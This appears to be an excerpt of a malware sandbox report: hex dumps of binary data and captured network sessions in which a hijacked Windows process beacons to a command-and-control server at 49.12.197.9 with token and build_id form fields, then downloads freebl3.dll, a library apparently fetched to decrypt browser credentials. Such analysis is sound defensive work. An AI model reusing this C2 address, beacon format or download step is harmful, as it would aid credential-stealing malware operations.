                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                                  Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                                  Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                  Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                  Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                                  Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                                  Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                                  Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  8192.168.2.64972949.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:04 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 829
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:04 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------DHCAAEBKEGHJKEBFHJDBCont
                                                                                                                                                                  2024-10-03 01:36:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:05 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  9192.168.2.64973049.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:06 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 437
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:06 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------ECBGCBGCAFIIECBFIDHICont
                                                                                                                                                                  2024-10-03 01:36:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:06 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  10192.168.2.64973149.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:07 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFI
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 437
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:07 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------CAEHCFCBKKJDGCAKFCFICont
                                                                                                                                                                  2024-10-03 01:36:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:08 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  11192.168.2.64973249.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:08 UTC195OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:09 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:09 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:09 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  2024-10-03 01:36:09 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                                                                                  Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                                                                                  Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                                                                                  Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                                                                                  Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                                                                                  Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                  2024-10-03 01:36:09 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                                                                                  Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
